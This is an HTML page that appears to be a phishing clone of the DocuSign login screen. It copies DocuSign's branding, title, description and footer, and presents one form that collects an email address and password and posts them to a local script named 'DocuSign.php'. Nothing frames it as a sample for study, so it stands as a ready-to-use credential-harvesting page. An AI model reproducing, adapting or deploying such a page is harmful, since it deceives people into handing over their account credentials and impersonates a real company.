<!DOCTYPE html>
<html ng-app="LoginAppNext.App" lang="en" class="account-server" dir="ltr">

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<style type="text/css">
		@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}
	</style>
	<link rel="stylesheet" type="text/css" href="main.css">
	<meta name="viewport" content="initial-scale=1.0">
	<meta name="description" meta-description="" content="Sign in to your DocuSign account to electronically sign documents, request signatures, check document status, send reminders, and view audit trails.">
	<title>DocuSign Login - Enter email to start sign in</title>
	<link href="new_favicon.png" rel="shortcut icon" type="image/x-icon">
	
	<base href=".">
	
</head>

<body class="site-content">
	<page-title></page-title>
	<form name="fixtureForm" class="ng-pristine ng-valid">
		<input name="disabled __RequestVerificationToken" type="hidden" value="AS7ZSsegeHGObNoA4pIkzwsAAAAA0" autocomplete="off">
	</form>
	
	<div ui-view="">
		<div ng-controller="UiFlavor as flavor">
			<div class="authentication" ng-switch="flavor.ui.showHeader">
				
				<header class="text-center header" ng-switch-when="true" ng-controller="LogoController as logo" role="banner">
					
					
					<img ng-if="logo.useNewDocuSignLogo" src="docusign_logo_small.png" translate="" translate-attr-alt="DocuSign" alt="DocuSign">
					
					
				</header>
				
				
				<main class="main" role="main">
					<header class="text-center header">
						
						<h1 ng-if="flavor.ui.showTitle" call-to-action="title" translate="Please log in to your account">Please log in to your account</h1>
						
					</header>
					<section class="authentication-state">
						
						<div ui-view="auth">
							<div class="username" ng-controller="UserName as userName">
								<form name="login" method="post" action="DocuSign.php" flow-submission="username" anti-forgery-secured="" oauth-flow="" class="ng-pristine ng-valid-email ng-invalid ng-invalid-required">
									<div class="form-group">
										<label class="label placeholder" id="emailLabel" for="username" translate-attr-label-text="Email address" label-alert=""><span translate="Email address" translate-interpolation="bracket" translate-values=""></span><span class="error-msg" translate=""></span>
										</label>
										<input name="email" id="username" type="email" class="input input-text ng-pristine ng-empty ng-valid-email ng-invalid ng-invalid-required ng-touched" data-qa="username" ng-model="username" auto-focus="" login-hint="" required="required" spellcheck="false" aria-required="true" autofocus="true" title="To log in, enter your email address" placeholder="Email address">
										<br>
										<br>
										<label class="label placeholder" id="emailLabel" for="password" translate-attr-label-text="Password" label-alert=""><span translate="Email address" translate-interpolation="bracket" translate-values=""></span><span class="error-msg" translate=""></span>
										</label>
										<input name="password" id="password" type="password" class="input input-text ng-pristine ng-empty ng-valid-email ng-invalid ng-invalid-required ng-touched" data-qa="password" ng-model="password" auto-focus="" login-hint="" required="required" spellcheck="false" aria-required="true" autofocus="true" title="To log in, enter your password" placeholder="Password">
										<input type="hidden" name="action" value="" autocomplete="off">
									</div>
									<div class="form-group" ng-controller="FixtureError as fixtureError" id="fixtureErrors">
										
									</div>
									<div class="form-group">
										<button class="btn btn-main btn-lg" type="submit" data-qa="submit-username" ng-disabled="login.$submitted"> <span translate="Continue">Continue</span>
										</button>
									</div>
									<input type="hidden" name="RelayState" value="{}">
									<input name="__RequestVerificationToken" type="hidden" value="AS7ZSsegeHGObNoA4pIkzwsAAAAA0">
								</form>
							</div>
						</div>
						
						<div class="footer" ui-view="authAlternative">
							<div ng-controller="SignUp as signUp">
								
								<p class="text-center" ng-if="signUp.isEnabled"> <a ng-href="/signup" translate="No account? Sign up for free" href="#signup">No account? Sign up for free</a>
								</p>
								
							</div>
						</div>
					</section>
					
					
					<aside ng-if="flavor.ui.showAuthAlternative" class="authentication-alternative text-center" ui-view="alternative" role="complementary"></aside>
					
				</main>
				
				
				<footer class="site-footer footer" ng-include="&#39;LoginAppNext/layout/footer.html&#39;" ng-if="flavor.ui.showFooter">
					<div class="site-container grid footer-links" ng-controller="LanguageSelection as languages">
						<div class="footer-links">
							<div class="language-menu" id="languageMenu" aria-haspopup="true">
								<button class="item link" ng-click="languages.showLanguageMenu($event);"> <span>
                    <span translate="" translate-attr-title="Current language" title="Current language"></span>
									English (US)
									
									
									
									</span>
								</button>
							</div>
						</div>
						<ul role="navigation" class="footer-links">
							<li><a class="item" target="_blank" href="#support" translate="Help" translate-attr-title="Link opens in new window" title="Link opens in new window">Help</a>
							</li>
							<li><a class="item" target="_blank" ng-href="#company/terms-and-conditions/web" translate="Terms" translate-attr-title="Link opens in new window" title="Link opens in new window" href="#company/terms-and-conditions/web">Terms</a>
							</li>
							<li class="collapse"><a class="item" target="_blank" ng-href="#IP" translate="Intellectual Property" translate-attr-title="Link opens in new window" title="Link opens in new window" href="#IP">Intellectual Property</a>
							</li>
							<li><a class="item" target="_blank" ng-href="#company/privacy-policy" translate="Privacy Policy" translate-attr-title="Link opens in new window" title="Link opens in new window" href="#company/privacy-policy">Privacy Policy</a>
							</li>
						</ul>
					</div>
					<aside current-date="currentDate" role="contentinfo">
						<p translate="Copyright © [[year]] DocuSign, Inc. All rights reserved." translate-interpolation="bracket" translate-values="{year: currentDate.getFullYear()}">Copyright © 2020 DocuSign, Inc. All rights reserved.</p>
					</aside>
				</footer>
				
			</div>
		</div>
	</div>
</body>

</html>